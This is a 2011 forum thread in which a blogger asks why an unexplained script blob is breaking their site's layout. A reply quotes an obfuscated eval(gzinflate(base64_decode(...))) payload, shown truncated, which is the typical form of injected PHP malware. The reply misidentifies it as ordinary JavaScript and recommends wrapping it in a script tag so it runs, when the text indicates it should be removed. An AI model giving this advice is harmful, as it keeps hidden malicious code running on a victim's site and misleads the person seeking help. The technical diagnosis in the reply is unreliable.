djalmabright Posted August 12, 2011 Posted August 12, 2011 I have a problem with my Blog homepage - http://earthmaps.heliohost.org , please look this, with a Javascript taking almost half of the template but I can t locate it within any file in the the source code, both in themes as in the php code . This is deforming the looking of my blog on all the pages and posts. Please help me to take it from there? Thanks. Quote
PenTester Posted August 16, 2011 Posted August 16, 2011 you have used the eval function outside the javascript. See this is your scirpt: <script type="text/javascript">var ajaxurl = "http://earthmaps.heliohost.org/wp-load.php";</script> eval(gzinflate(base64_decode('FZrHbuzYFUV/xTN3mwMWMwmjB8w5Z04M5ljFHL/efDNBggqqe89Ze+0S/1Ue6fBX/bS/aki38q8sXUs..............................................................gP/6Pw==')));/**/ Did you notice that you have closed the script tag before the eval function itself? Put eval function inside script tag. Like this: <script type="text/javascript">var ajaxurl = "http://earthmaps.heliohost.org/wp-load.php"; eval(gzinflate(base64_decode('FZrHbuzYFUV/xTN3mwMWMwmjB8w5Z04M5ljFHL/efDNBggqqe89Ze+0S/1Ue6fBX/bS/aki38q8sXUs..............................................................gP/6Pw==')));/**/ </script> Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.